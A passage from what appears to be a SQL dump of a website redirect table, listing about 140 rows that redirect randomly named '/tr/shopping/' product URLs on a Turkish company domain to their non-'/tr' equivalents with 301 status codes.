02:09:58','0000-00-00 00:00:00',301),(70189,'https://3s-technologies.com.tr/tr/shopping/xanthoxylum/2112950130.html',NULL,'https://3s-technologies.com.tr/shopping/xanthoxylum/2112950130.html','',1,0,'2026-06-11 02:10:01','0000-00-00 00:00:00',301),(70190,'https://3s-technologies.com.tr/tr/shopping/quadrinomical/2813100685.html',NULL,'https://3s-technologies.com.tr/shopping/quadrinomical/2813100685.html','',1,0,'2026-06-11 02:10:04','0000-00-00 00:00:00',301),(70191,'https://3s-technologies.com.tr/tr/shopping/centralized/3549592555.html',NULL,'https://3s-technologies.com.tr/shopping/centralized/3549592555.html','',1,0,'2026-06-11 02:10:07','0000-00-00 00:00:00',301),(70192,'https://3s-technologies.com.tr/tr/shopping/carnification/2658732293.html',NULL,'https://3s-technologies.com.tr/shopping/carnification/2658732293.html','',1,0,'2026-06-11 02:10:10','0000-00-00 00:00:00',301),(70193,'https://3s-technologies.com.tr/tr/shopping/handicapper/1115380688.html',NULL,'https://3s-technologies.com.tr/shopping/handicapper/1115380688.html','',1,0,'2026-06-11 02:10:13','0000-00-00 00:00:00',301),(70194,'https://3s-technologies.com.tr/tr/shopping/rafting/2807299782.html',NULL,'https://3s-technologies.com.tr/shopping/rafting/2807299782.html','',1,0,'2026-06-11 02:10:16','0000-00-00 00:00:00',301),(70195,'https://3s-technologies.com.tr/tr/shopping/oiling/3468058937.html',NULL,'https://3s-technologies.com.tr/shopping/oiling/3468058937.html','',1,0,'2026-06-11 02:10:19','0000-00-00 00:00:00',301),(70196,'https://3s-technologies.com.tr/tr/shopping/foundering/637659847.html',NULL,'https://3s-technologies.com.tr/shopping/foundering/637659847.html','',1,0,'2026-06-11 02:10:22','0000-00-00 00:00:00',301),(70197,'https://3s-technologies.com.tr/tr/shopping/foremanship/749360193.html',NULL,'https://3s-technologies.com.tr/shopping/foremanship/749360193.html','',1,0,'2026-06-11 02:10:25','0000-00-00 00:00:00',301),(70198,'https://3s-technologies.com.tr/tr/shopping/ratoon/88993527.html',NULL,'https://3s-technologies.com.tr/shopping/ratoon/88993527.html','',1,0,'2026-06-11 02:10:28','0000-00-00 00:00:00',301),(70199,'https://3s-technologies.com.tr/tr/shopping/macaca/4281721548.html',NULL,'https://3s-technologies.com.tr/shopping/macaca/4281721548.html','',1,0,'2026-06-11 02:10:31','0000-00-00 00:00:00',301),(70200,'https://3s-technologies.com.tr/tr/shopping/pompet/4254861872.html',NULL,'https://3s-technologies.com.tr/shopping/pompet/4254861872.html','',1,0,'2026-06-11 02:10:34','0000-00-00 00:00:00',301),(70201,'https://3s-technologies.com.tr/tr/shopping/corbeling/3196057675.html',NULL,'https://3s-technologies.com.tr/shopping/corbeling/3196057675.html','',1,0,'2026-06-11 02:10:37','0000-00-00 00:00:00',301),(70202,'https://3s-technologies.com.tr/tr/shopping/astoop/245761034.html',NULL,'https://3s-technologies.com.tr/shopping/astoop/245761034.html','',1,0,'2026-06-11 02:10:40','0000-00-00 00:00:00',301),(70203,'https://3s-technologies.com.tr/tr/shopping/motionless/1040117214.html',NULL,'https://3s-technologies.com.tr/shopping/motionless/1040117214.html','',1,0,'2026-06-11 02:10:43','0000-00-00 00:00:00',301),(70204,'https://3s-technologies.com.tr/tr/shopping/clave/1484359313.html',NULL,'https://3s-technologies.com.tr/shopping/clave/1484359313.html','',1,0,'2026-06-11 02:10:46','0000-00-00 00:00:00',301),(70205,'https://3s-technologies.com.tr/tr/shopping/pledged/1291830359.html',NULL,'https://3s-technologies.com.tr/shopping/pledged/1291830359.html','',1,0,'2026-06-11 02:10:49','0000-00-00 00:00:00',301),(70206,'https://3s-technologies.com.tr/tr/shopping/microphonic/242384345.html',NULL,'https://3s-technologies.com.tr/shopping/microphonic/242384345.html','',1,0,'2026-06-11 02:10:52','0000-00-00 00:00:00',301),(70207,'https://3s-technologies.com.tr/tr/shopping/hemippus/495615339.html',NULL,'https://3s-technologies.com.tr/shopping/hemippus/495615339.html','',1,0,'2026-06-11 02:11:11','0000-00-00 00:00:00',301),(70208,'https://3s-technologies.com.tr/tr/shopping/toutensemble/1673946646.html',NULL,'https://3s-technologies.com.tr/shopping/toutensemble/1673946646.html','',1,0,'2026-06-11 02:11:13','0000-00-00 00:00:00',301),(70209,'https://3s-technologies.com.tr/tr/shopping/coralliform/4210631029.html',NULL,'https://3s-technologies.com.tr/shopping/coralliform/4210631029.html','',1,0,'2026-06-11 02:11:16','0000-00-00 00:00:00',301),(70210,'https://3s-technologies.com.tr/tr/shopping/stenton/3855697220.html',NULL,'https://3s-technologies.com.tr/shopping/stenton/3855697220.html','',1,0,'2026-06-11 02:11:19','0000-00-00 00:00:00',301),(70211,'https://3s-technologies.com.tr/tr/shopping/corral/935710505.html',NULL,'https://3s-technologies.com.tr/shopping/corral/935710505.html','',1,0,'2026-06-11 02:11:22','0000-00-00 00:00:00',301),(70212,'https://3s-technologies.com.tr/tr/shopping/ulceration/47040475.html',NULL,'https://3s-technologies.com.tr/shopping/ulceration/47040475.html','',1,0,'2026-06-11 02:11:25','0000-00-00 00:00:00',301),(70213,'https://3s-technologies.com.tr/tr/shopping/surbedding/3621895141.html',NULL,'https://3s-technologies.com.tr/shopping/surbedding/3621895141.html','',1,0,'2026-06-11 02:11:28','0000-00-00 00:00:00',301),(70214,'https://3s-technologies.com.tr/tr/shopping/superb/1795612308.html',NULL,'https://3s-technologies.com.tr/shopping/superb/1795612308.html','',1,0,'2026-06-11 02:11:31','0000-00-00 00:00:00',301),(70215,'https://3s-technologies.com.tr/tr/shopping/longer/3849615698.html',NULL,'https://3s-technologies.com.tr/shopping/longer/3849615698.html','',1,0,'2026-06-11 02:11:34','0000-00-00 00:00:00',301),(70216,'https://3s-technologies.com.tr/tr/shopping/hoaxing/4123741926.html',NULL,'https://3s-technologies.com.tr/shopping/hoaxing/4123741926.html','',1,0,'2026-06-11 02:11:37','0000-00-00 00:00:00',301),(70217,'https://3s-technologies.com.tr/tr/shopping/urceoli/430489246.html',NULL,'https://3s-technologies.com.tr/shopping/urceoli/430489246.html','',1,0,'2026-06-11 02:11:40','0000-00-00 00:00:00',301),(70218,'https://3s-technologies.com.tr/tr/shopping/tomography/2775570683.html',NULL,'https://3s-technologies.com.tr/shopping/tomography/2775570683.html','',1,0,'2026-06-11 02:11:43','0000-00-00 00:00:00',301),(70219,'https://3s-technologies.com.tr/tr/shopping/impeccability/664797427.html',NULL,'https://3s-technologies.com.tr/shopping/impeccability/664797427.html','',1,0,'2026-06-11 02:11:46','0000-00-00 00:00:00',301),(70220,'https://3s-technologies.com.tr/tr/shopping/burry/2168366913.html',NULL,'https://3s-technologies.com.tr/shopping/burry/2168366913.html','',1,0,'2026-06-11 02:11:49','0000-00-00 00:00:00',301),(70221,'https://3s-technologies.com.tr/tr/shopping/transient/3148631962.html',NULL,'https://3s-technologies.com.tr/shopping/transient/3148631962.html','',1,0,'2026-06-11 02:11:52','0000-00-00 00:00:00',301),(70222,'https://3s-technologies.com.tr/tr/shopping/sinapism/2053413794.html',NULL,'https://3s-technologies.com.tr/shopping/sinapism/2053413794.html','',1,0,'2026-06-11 02:11:55','0000-00-00 00:00:00',301),(70223,'https://3s-technologies.com.tr/tr/shopping/pinnulate/2925588755.html',NULL,'https://3s-technologies.com.tr/shopping/pinnulate/2925588755.html','',1,0,'2026-06-11 02:11:58','0000-00-00 00:00:00',301),(70224,'https://3s-technologies.com.tr/tr/shopping/draintrap/2554981243.html',NULL,'https://3s-technologies.com.tr/shopping/draintrap/2554981243.html','',1,0,'2026-06-11 02:12:01','0000-00-00 00:00:00',301),(70225,'https://3s-technologies.com.tr/tr/shopping/underfong/968930626.html',NULL,'https://3s-technologies.com.tr/shopping/underfong/968930626.html','',1,0,'2026-06-11 02:12:04','0000-00-00 00:00:00',301),(70226,'https://3s-technologies.com.tr/tr/shopping/impeached/2993747198.html',NULL,'https://3s-technologies.com.tr/shopping/impeached/2993747198.html','',1,0,'2026-06-11 02:12:43','0000-00-00 00:00:00',301),(70227,'https://3s-technologies.com.tr/tr/shopping/roberd/2402142922.html',NULL,'https://3s-technologies.com.tr/shopping/roberd/2402142922.html','',1,0,'2026-06-11 02:12:46','0000-00-00 00:00:00',301),(70228,'https://3s-technologies.com.tr/tr/shopping/afterclap/4095488348.html',NULL,'https://3s-technologies.com.tr/shopping/afterclap/4095488348.html','',1,0,'2026-06-11 02:12:48','0000-00-00 00:00:00',301),(70229,'https://3s-technologies.com.tr/tr/shopping/gardenly/3728024997.html',NULL,'https://3s-technologies.com.tr/shopping/gardenly/3728024997.html','',1,0,'2026-06-11 02:12:51','0000-00-00 00:00:00',301),(70230,'https://3s-technologies.com.tr/tr/shopping/avocet/677057575.html',NULL,'https://3s-technologies.com.tr/shopping/avocet/677057575.html','',1,0,'2026-06-11 02:12:54','0000-00-00 00:00:00',301),(70231,'https://3s-technologies.com.tr/tr/shopping/howdah/3853369107.html',NULL,'https://3s-technologies.com.tr/shopping/howdah/3853369107.html','',1,0,'2026-06-11 02:12:57','0000-00-00 00:00:00',301),(70232,'https://3s-technologies.com.tr/tr/shopping/acrogen/2283019573.html',NULL,'https://3s-technologies.com.tr/shopping/acrogen/2283019573.html','',1,0,'2026-06-11 02:13:00','0000-00-00 00:00:00',301),(70233,'https://3s-technologies.com.tr/tr/shopping/caskful/2946548712.html',NULL,'https://3s-technologies.com.tr/shopping/caskful/2946548712.html','',1,0,'2026-06-11 02:13:03','0000-00-00 00:00:00',301),(70234,'https://3s-technologies.com.tr/tr/shopping/superannuated/711995897.html',NULL,'https://3s-technologies.com.tr/shopping/superannuated/711995897.html','',1,0,'2026-06-11 02:13:06','0000-00-00 00:00:00',301),(70235,'https://3s-technologies.com.tr/tr/shopping/pendicler/2032518528.html',NULL,'https://3s-technologies.com.tr/shopping/pendicler/2032518528.html','',1,0,'2026-06-11 02:13:09','0000-00-00 00:00:00',301),(70236,'https://3s-technologies.com.tr/tr/shopping/uniting/120555160.html',NULL,'https://3s-technologies.com.tr/shopping/uniting/120555160.html','',1,0,'2026-06-11 02:13:12','0000-00-00 00:00:00',301),(70237,'https://3s-technologies.com.tr/tr/shopping/ransacked/1464137647.html',NULL,'https://3s-technologies.com.tr/shopping/ransacked/1464137647.html','',1,0,'2026-06-11 02:13:15','0000-00-00 00:00:00',301),(70238,'https://3s-technologies.com.tr/tr/shopping/hemeralopia/1232785820.html',NULL,'https://3s-technologies.com.tr/shopping/hemeralopia/1232785820.html','',1,0,'2026-06-11 02:13:18','0000-00-00 00:00:00',301),(70239,'https://3s-technologies.com.tr/tr/shopping/pharmaceutics/2845221844.html',NULL,'https://3s-technologies.com.tr/shopping/pharmaceutics/2845221844.html','',1,0,'2026-06-11 02:13:22','0000-00-00 00:00:00',301),(70240,'https://3s-technologies.com.tr/tr/shopping/kidnapping/2529022655.html',NULL,'https://3s-technologies.com.tr/shopping/kidnapping/2529022655.html','',1,0,'2026-06-11 02:13:24','0000-00-00 00:00:00',301),(70241,'https://3s-technologies.com.tr/tr/shopping/crumblecap/2054625877.html',NULL,'https://3s-technologies.com.tr/shopping/crumblecap/2054625877.html','',1,0,'2026-06-11 02:13:27','0000-00-00 00:00:00',301),(70242,'https://3s-technologies.com.tr/tr/shopping/acquiesced/1504483891.html',NULL,'https://3s-technologies.com.tr/shopping/acquiesced/1504483891.html','',1,0,'2026-06-11 02:13:30','0000-00-00 00:00:00',301),(70243,'https://3s-technologies.com.tr/tr/shopping/evidentially/2443953787.html',NULL,'https://3s-technologies.com.tr/shopping/evidentially/2443953787.html','',1,0,'2026-06-11 02:13:33','0000-00-00 00:00:00',301),(70244,'https://3s-technologies.com.tr/tr/shopping/misbehave/3121330875.html',NULL,'https://3s-technologies.com.tr/shopping/misbehave/3121330875.html','',1,0,'2026-06-11 02:13:36','0000-00-00 00:00:00',301),(70245,'https://3s-technologies.com.tr/tr/shopping/purlin/3332435243.html',NULL,'https://3s-technologies.com.tr/shopping/purlin/3332435243.html','',1,0,'2026-06-11 02:13:42','0000-00-00 00:00:00',301),(70246,'https://3s-technologies.com.tr/tr/shopping/levorotatory/2532562851.html',NULL,'https://3s-technologies.com.tr/shopping/levorotatory/2532562851.html','',1,0,'2026-06-11 02:13:46','0000-00-00 00:00:00',301),(70247,'https://3s-technologies.com.tr/tr/shopping/leptosomus/285243770.html',NULL,'https://3s-technologies.com.tr/shopping/leptosomus/285243770.html','',1,0,'2026-06-11 02:13:49','0000-00-00 00:00:00',301),(70248,'https://3s-technologies.com.tr/tr/shopping/desolatory/1364271409.html',NULL,'https://3s-technologies.com.tr/shopping/desolatory/1364271409.html','',1,0,'2026-06-11 02:13:52','0000-00-00 00:00:00',301),(70249,'https://3s-technologies.com.tr/tr/shopping/fulcrate/1731175202.html',NULL,'https://3s-technologies.com.tr/shopping/fulcrate/1731175202.html','',1,0,'2026-06-11 02:13:55','0000-00-00 00:00:00',301),(70250,'https://3s-technologies.com.tr/tr/shopping/negatived/2491379484.html',NULL,'https://3s-technologies.com.tr/shopping/negatived/2491379484.html','',1,0,'2026-06-11 02:13:58','0000-00-00 00:00:00',301),(70251,'https://3s-technologies.com.tr/tr/shopping/penetrans/3280257219.html',NULL,'https://3s-technologies.com.tr/shopping/penetrans/3280257219.html','',1,0,'2026-06-11 02:14:01','0000-00-00 00:00:00',301),(70252,'https://3s-technologies.com.tr/tr/shopping/outline/3781315052.html',NULL,'https://3s-technologies.com.tr/shopping/outline/3781315052.html','',1,0,'2026-06-11 02:14:04','0000-00-00 00:00:00',301),(70253,'https://3s-technologies.com.tr/tr/shopping/headboard/2566831548.html',NULL,'https://3s-technologies.com.tr/shopping/headboard/2566831548.html','',1,0,'2026-06-11 02:14:07','0000-00-00 00:00:00',301),(70254,'https://3s-technologies.com.tr/tr/shopping/marshal/3283893532.html',NULL,'https://3s-technologies.com.tr/shopping/marshal/3283893532.html','',1,0,'2026-06-11 02:14:10','0000-00-00 00:00:00',301),(70255,'https://3s-technologies.com.tr/tr/shopping/overhauling/2955353656.html',NULL,'https://3s-technologies.com.tr/shopping/overhauling/2955353656.html','',1,0,'2026-06-11 02:14:13','0000-00-00 00:00:00',301),(70256,'https://3s-technologies.com.tr/tr/shopping/rostel/2245623946.html',NULL,'https://3s-technologies.com.tr/shopping/rostel/2245623946.html','',1,0,'2026-06-11 02:14:16','0000-00-00 00:00:00',301),(70257,'https://3s-technologies.com.tr/tr/shopping/welew/2314322632.html',NULL,'https://3s-technologies.com.tr/shopping/welew/2314322632.html','',1,0,'2026-06-11 02:14:19','0000-00-00 00:00:00',301),(70258,'https://3s-technologies.com.tr/tr/shopping/chenopodium/736122463.html',NULL,'https://3s-technologies.com.tr/shopping/chenopodium/736122463.html','',1,0,'2026-06-11 02:14:22','0000-00-00 00:00:00',301),(70259,'https://3s-technologies.com.tr/tr/shopping/busheling/3358738447.html',NULL,'https://3s-technologies.com.tr/shopping/busheling/3358738447.html','',1,0,'2026-06-11 02:14:25','0000-00-00 00:00:00',301),(70260,'https://3s-technologies.com.tr/tr/shopping/confeder/2680153994.html',NULL,'https://3s-technologies.com.tr/shopping/confeder/2680153994.html','',1,0,'2026-06-11 02:14:28','0000-00-00 00:00:00',301),(70261,'https://3s-technologies.com.tr/tr/shopping/faroff/1156206649.html',NULL,'https://3s-technologies.com.tr/shopping/faroff/1156206649.html','',1,0,'2026-06-11 02:14:31','0000-00-00 00:00:00',301),(70262,'https://3s-technologies.com.tr/tr/shopping/transpatronize/137652627.html',NULL,'https://3s-technologies.com.tr/shopping/transpatronize/137652627.html','',1,0,'2026-06-11 02:14:34','0000-00-00 00:00:00',301),(70263,'https://3s-technologies.com.tr/tr/shopping/candiot/1855168977.html',NULL,'https://3s-technologies.com.tr/shopping/candiot/1855168977.html','',1,0,'2026-06-11 02:14:37','0000-00-00 00:00:00',301),(70264,'https://3s-technologies.com.tr/tr/shopping/gentes/1568629332.html',NULL,'https://3s-technologies.com.tr/shopping/gentes/1568629332.html','',1,0,'2026-06-11 02:14:56','0000-00-00 00:00:00',301),(70265,'https://3s-technologies.com.tr/tr/shopping/impartibility/1856381060.html',NULL,'https://3s-technologies.com.tr/shopping/impartibility/1856381060.html','',1,0,'2026-06-11 02:14:58','0000-00-00 00:00:00',301),(70266,'https://3s-technologies.com.tr/tr/shopping/gabioned/624402850.html',NULL,'https://3s-technologies.com.tr/shopping/gabioned/624402850.html','',1,0,'2026-06-11 02:15:01','0000-00-00 00:00:00',301),(70267,'https://3s-technologies.com.tr/tr/shopping/intervenue/1435198373.html',NULL,'https://3s-technologies.com.tr/shopping/intervenue/1435198373.html','',1,0,'2026-06-11 02:15:04','0000-00-00 00:00:00',301),(70268,'https://3s-technologies.com.tr/tr/shopping/starstone/1884848854.html',NULL,'https://3s-technologies.com.tr/shopping/starstone/1884848854.html','',1,0,'2026-06-11 02:15:07','0000-00-00 00:00:00',301),(70269,'https://3s-technologies.com.tr/tr/shopping/monoclinous/2107070712.html',NULL,'https://3s-technologies.com.tr/shopping/monoclinous/2107070712.html','',1,0,'2026-06-11 02:15:10','0000-00-00 00:00:00',301),(70270,'https://3s-technologies.com.tr/tr/shopping/benzule/748233102.html',NULL,'https://3s-technologies.com.tr/shopping/benzule/748233102.html','',1,0,'2026-06-11 02:15:13','0000-00-00 00:00:00',301),(70271,'https://3s-technologies.com.tr/tr/shopping/maldane/4264223272.html',NULL,'https://3s-technologies.com.tr/shopping/maldane/4264223272.html','',1,0,'2026-06-11 02:15:16','0000-00-00 00:00:00',301),(70272,'https://3s-technologies.com.tr/tr/shopping/preannounce/1815361216.html',NULL,'https://3s-technologies.com.tr/shopping/preannounce/1815361216.html','',1,0,'2026-06-11 02:15:19','0000-00-00 00:00:00',301),(70273,'https://3s-technologies.com.tr/tr/shopping/galei/3602904131.html',NULL,'https://3s-technologies.com.tr/shopping/galei/3602904131.html','',1,0,'2026-06-11 02:15:22','0000-00-00 00:00:00',301),(70274,'https://3s-technologies.com.tr/tr/shopping/meticulously/3621980149.html',NULL,'https://3s-technologies.com.tr/shopping/meticulously/3621980149.html','',1,0,'2026-06-11 02:15:25','0000-00-00 00:00:00',301),(70275,'https://3s-technologies.com.tr/tr/shopping/toxicogenic/208579607.html',NULL,'https://3s-technologies.com.tr/shopping/toxicogenic/208579607.html','',1,0,'2026-06-11 02:15:28','0000-00-00 00:00:00',301),(70276,'https://3s-technologies.com.tr/tr/shopping/thigmotaxis/3386992025.html',NULL,'https://3s-technologies.com.tr/shopping/thigmotaxis/3386992025.html','',1,0,'2026-06-11 02:15:31','0000-00-00 00:00:00',301),(70277,'https://3s-technologies.com.tr/tr/shopping/occludent/642710395.html',NULL,'https://3s-technologies.com.tr/shopping/occludent/642710395.html','',1,0,'2026-06-11 02:15:34','0000-00-00 00:00:00',301),(70278,'https://3s-technologies.com.tr/tr/shopping/medievalism/999741904.html',NULL,'https://3s-technologies.com.tr/shopping/medievalism/999741904.html','',1,0,'2026-06-11 02:15:37','0000-00-00 00:00:00',301),(70279,'https://3s-technologies.com.tr/tr/shopping/mortgaged/2941046062.html',NULL,'https://3s-technologies.com.tr/shopping/mortgaged/2941046062.html','',1,0,'2026-06-11 02:15:41','0000-00-00 00:00:00',301),(70280,'https://3s-technologies.com.tr/tr/shopping/lungs/2511667601.html',NULL,'https://3s-technologies.com.tr/shopping/lungs/2511667601.html','',1,0,'2026-06-11 02:15:43','0000-00-00 00:00:00',301),(70281,'https://3s-technologies.com.tr/tr/shopping/trogostolon/3945212673.html',NULL,'https://3s-technologies.com.tr/shopping/trogostolon/3945212673.html','',1,0,'2026-06-11 02:15:46','0000-00-00 00:00:00',301),(70282,'https://3s-technologies.com.tr/tr/shopping/bacillariae/227492102.html',NULL,'https://3s-technologies.com.tr/shopping/bacillariae/227492102.html','',1,0,'2026-06-11 02:15:54','0000-00-00 00:00:00',301),(70283,'https://3s-technologies.com.tr/tr/shopping/spondaic/344568992.html',NULL,'https://3s-technologies.com.tr/shopping/spondaic/344568992.html','',1,0,'2026-06-11 02:15:58','0000-00-00 00:00:00',301),(70284,'https://3s-technologies.com.tr/tr/shopping/transpiration/4042606380.html',NULL,'https://3s-technologies.com.tr/shopping/transpiration/4042606380.html','',1,0,'2026-06-11 02:16:01','0000-00-00 00:00:00',301),(70285,'https://3s-technologies.com.tr/tr/shopping/exteriorisation/3439006526.html',NULL,'https://3s-technologies.com.tr/shopping/exteriorisation/3439006526.html','',1,0,'2026-06-11 02:16:04','0000-00-00 00:00:00',301),(70286,'https://3s-technologies.com.tr/tr/shopping/vitaille/2219534958.html',NULL,'https://3s-technologies.com.tr/shopping/vitaille/2219534958.html','',1,0,'2026-06-11 02:16:07','0000-00-00 00:00:00',301),(70287,'https://3s-technologies.com.tr/tr/shopping/incompassionate/136440544.html',NULL,'https://3s-technologies.com.tr/shopping/incompassionate/136440544.html','',1,0,'2026-06-11 02:16:10','0000-00-00 00:00:00',301),(70288,'https://3s-technologies.com.tr/tr/shopping/rabanet/476787852.html',NULL,'https://3s-technologies.com.tr/shopping/rabanet/476787852.html','',1,0,'2026-06-11 02:16:13','0000-00-00 00:00:00',301),(70289,'https://3s-technologies.com.tr/tr/shopping/angulatus/619419862.html',NULL,'https://3s-technologies.com.tr/shopping/angulatus/619419862.html','',1,0,'2026-06-11 02:16:16','0000-00-00 00:00:00',301),(70290,'https://3s-technologies.com.tr/tr/shopping/chimneysweep/2368742599.html',NULL,'https://3s-technologies.com.tr/shopping/chimneysweep/2368742599.html','',1,0,'2026-06-11 02:16:19','0000-00-00 00:00:00',301),(70291,'https://3s-technologies.com.tr/tr/shopping/ochreaee/3168234431.html',NULL,'https://3s-technologies.com.tr/shopping/ochreaee/3168234431.html','',1,0,'2026-06-11 02:16:22','0000-00-00 00:00:00',301),(70292,'https://3s-technologies.com.tr/tr/shopping/antenatal/319250644.html',NULL,'https://3s-technologies.com.tr/shopping/antenatal/319250644.html','',1,0,'2026-06-11 02:16:25','0000-00-00 00:00:00',301),(70293,'https://3s-technologies.com.tr/tr/shopping/mansion/2910348723.html',NULL,'https://3s-technologies.com.tr/shopping/mansion/2910348723.html','',1,0,'2026-06-11 02:16:28','0000-00-00 00:00:00',301),(70294,'https://3s-technologies.com.tr/tr/shopping/annoyous/243798580.html',NULL,'https://3s-technologies.com.tr/shopping/annoyous/243798580.html','',1,0,'2026-06-11 02:16:31','0000-00-00 00:00:00',301),(70295,'https://3s-technologies.com.tr/tr/shopping/baphia/3741317714.html',NULL,'https://3s-technologies.com.tr/shopping/baphia/3741317714.html','',1,0,'2026-06-11 02:16:34','0000-00-00 00:00:00',301),(70296,'https://3s-technologies.com.tr/tr/shopping/awful/606442846.html',NULL,'https://3s-technologies.com.tr/shopping/awful/606442846.html','',1,0,'2026-06-11 02:16:37','0000-00-00 00:00:00',301),(70297,'https://3s-technologies.com.tr/tr/shopping/myrtaceae/1841286681.html',NULL,'https://3s-technologies.com.tr/shopping/myrtaceae/1841286681.html','',1,0,'2026-06-11 02:16:40','0000-00-00 00:00:00',301),(70298,'https://3s-technologies.com.tr/tr/shopping/neglectful/470823442.html',NULL,'https://3s-technologies.com.tr/shopping/neglectful/470823442.html','',1,0,'2026-06-11 02:16:43','0000-00-00 00:00:00',301),(70299,'https://3s-technologies.com.tr/tr/shopping/oafish/3281469318.html',NULL,'https://3s-technologies.com.tr/shopping/oafish/3281469318.html','',1,0,'2026-06-11 02:16:52','0000-00-00 00:00:00',301),(70300,'https://3s-technologies.com.tr/tr/shopping/ulcerous/1295438915.html',NULL,'https://3s-technologies.com.tr/shopping/ulcerous/1295438915.html','',1,0,'2026-06-11 02:16:55','0000-00-00 00:00:00',301),(70301,'https://3s-technologies.com.tr/tr/shopping/cinnamyl/4018321691.html',NULL,'https://3s-technologies.com.tr/shopping/cinnamyl/4018321691.html','',1,0,'2026-06-11 02:16:58','0000-00-00 00:00:00',301),(70302,'https://3s-technologies.com.tr/tr/shopping/milked/3765469648.html',NULL,'https://3s-technologies.com.tr/shopping/milked/3765469648.html','',1,0,'2026-06-11 02:17:01','0000-00-00 00:00:00',301),(70303,'https://3s-technologies.com.tr/tr/shopping/peccadillo/155055724.html',NULL,'https://3s-technologies.com.tr/shopping/peccadillo/155055724.html','',1,0,'2026-06-11 02:17:05','0000-00-00 00:00:00',301),(70304,'https://3s-technologies.com.tr/tr/shopping/penuriously/1958363555.html',NULL,'https://3s-technologies.com.tr/shopping/penuriously/1958363555.html','',1,0,'2026-06-11 02:17:07','0000-00-00 00:00:00',301),(70305,'https://3s-technologies.com.tr/tr/shopping/unreality/2108282827.html',NULL,'https://3s-technologies.com.tr/shopping/unreality/2108282827.html','',1,0,'2026-06-11 02:17:10','0000-00-00 00:00:00',301),(70306,'https://3s-technologies.com.tr/tr/shopping/pickeer/3856994327.html',NULL,'https://3s-technologies.com.tr/shopping/pickeer/3856994327.html','',1,0,'2026-06-11 02:17:13','0000-00-00 00:00:00',301),(70307,'https://3s-technologies.com.tr/tr/shopping/robalo/2516256373.html',NULL,'https://3s-technologies.com.tr/shopping/robalo/2516256373.html','',1,0,'2026-06-11 02:17:16','0000-00-00 00:00:00',301),(70308,'https://3s-technologies.com.tr/tr/shopping/syndactylic/2783112835.html',NULL,'https://3s-technologies.com.tr/shopping/syndactylic/2783112835.html','',1,0,'2026-06-11 02:17:19','0000-00-00 00:00:00',301),(70309,'https://3s-technologies.com.tr/tr/shopping/pesto/1880096559.html',NULL,'https://3s-technologies.com.tr/shopping/pesto/1880096559.html','',1,0,'2026-06-11 02:17:22','0000-00-00 00:00:00',301),(70310,'https://3s-technologies.com.tr/tr/shopping/lethean/3743645811.html',NULL,'https://3s-technologies.com.tr/shopping/lethean/3743645811.html','',1,0,'2026-06-11 02:17:25','0000-00-00 00:00:00',301),(70311,'https://3s-technologies.com.tr/tr/shopping/caliginousness/746068512.html',NULL,'https://3s-technologies.com.tr/shopping/caliginousness/746068512.html','',1,0,'2026-06-11 02:17:28','0000-00-00 00:00:00',301),(70312,'https://3s-technologies.com.tr/tr/shopping/mastodon/1274054195.html',NULL,'https://3s-technologies.com.tr/shopping/mastodon/1274054195.html','',1,0,'2026-06-11 02:17:31','0000-00-00 00:00:00',301),(70313,'https://3s-technologies.com.tr/tr/shopping/suricata/3190341780.html',NULL,'https://3s-technologies.com.tr/shopping/suricata/3190341780.html','',1,0,'2026-06-11 02:17:34','0000-00-00 00:00:00',301),(70314,'https://3s-technologies.com.tr/tr/shopping/leeward/2504491076.html',NULL,'https://3s-technologies.com.tr/shopping/leeward/2504491076.html','',1,0,'2026-06-11 02:17:37','0000-00-00 00:00:00',301),(70315,'https://3s-technologies.com.tr/tr/shopping/velocimeter/1198438624.html',NULL,'https://3s-technologies.com.tr/shopping/velocimeter/1198438624.html','',1,0,'2026-06-11 02:17:40','0000-00-00 00:00:00',301),(70316,'https://3s-technologies.com.tr/tr/shopping/silicispongiae/3306787666.html',NULL,'https://3s-technologies.com.tr/shopping/silicispongiae/3306787666.html','',1,0,'2026-06-11 02:17:43','0000-00-00 00:00:00',301),(70317,'https://3s-technologies.com.tr/tr/shopping/bergamot/1354536474.html',NULL,'https://3s-technologies.com.tr/shopping/bergamot/1354536474.html','',1,0,'2026-06-11 02:17:46','0000-00-00 00:00:00',301),(70318,'https://3s-technologies.com.tr/tr/shopping/supernaturally/1876505654.html',NULL,'https://3s-technologies.com.tr/shopping/supernaturally/1876505654.html','',1,0,'2026-06-11 02:17:50','0000-00-00 00:00:00',301),(70319,'https://3s-technologies.com.tr/tr/shopping/judas/1769147618.html',NULL,'https://3s-technologies.com.tr/shopping/judas/1769147618.html','',1,0,'2026-06-11 02:17:52','0000-00-00 00:00:00',301),(70320,'https://3s-technologies.com.tr/tr/shopping/nototherium/438751716.html',NULL,'https://3s-technologies.com.tr/shopping/nototherium/438751716.html','',1,0,'2026-06-11 02:17:57','0000-00-00 00:00:00',301),(70321,'https://3s-technologies.com.tr/tr/shopping/wawaskeesh/3236909262.html',NULL,'https://3s-technologies.com.tr/shopping/wawaskeesh/3236909262.html','',1,0,'2026-06-11 02:18:01','0000-00-00 00:00:00',301),(70322,'https://3s-technologies.com.tr/tr/shopping/oxyrhyncha/1049332191.html',NULL,'https://3s-technologies.com.tr/shopping/oxyrhyncha/1049332191.html','',1,0,'2026-06-11 02:18:04','0000-00-00 00:00:00',301),(70323,'https://3s-technologies.com.tr/tr/shopping/lithophosphor/1954727258.html',NULL,'https://3s-technologies.com.tr/shopping/lithophosphor/1954727258.html','',1,0,'2026-06-11 02:18:07','0000-00-00 00:00:00',301),(70324,'https://3s-technologies.com.tr/tr/shopping/anabolism/942792822.html',NULL,'https://3s-technologies.com.tr/shopping/anabolism/942792822.html','',1,0,'2026-06-11 02:18:10','0000-00-00 00:00:00',301),(70325,'https://3s-technologies.com.tr/tr/shopping/raconteur/1228937216.html',NULL,'https://3s-technologies.com.tr/shopping/raconteur/1228937216.html','',1,0,'2026-06-11 02:18:19','0000-00-00 00:00:00',301),(70326,'https://3s-technologies.com.tr/tr/shopping/inexpediently/1752253622.html',NULL,'https://3s-technologies.com.tr/shopping/inexpediently/1752253622.html','',1,0,'2026-06-11 02:18:21','0000-00-00 00:00:00',301),(70327,'https://3s-technologies.com.tr/tr/shopping/latinism/592726692.html',NULL,'https://3s-technologies.com.tr/shopping/latinism/592726692.html','',1,0,'2026-06-11 02:18:24','0000-00-00 00:00:00',301),(70328,'https://3s-technologies.com.tr/tr/shopping/toluric/738891987.html',NULL,'https://3s-technologies.com.tr/shopping/toluric/738891987.html','',1,0,'2026-06-11 02:18:28','0000-00-00 00:00:00',301),(70329,'https://3s-technologies.com.tr/tr/shopping/areosystyle/852805937.html',NULL,'https://3s-technologies.com.tr/shopping/areosystyle/852805937.html','',1,0,'2026-06-11 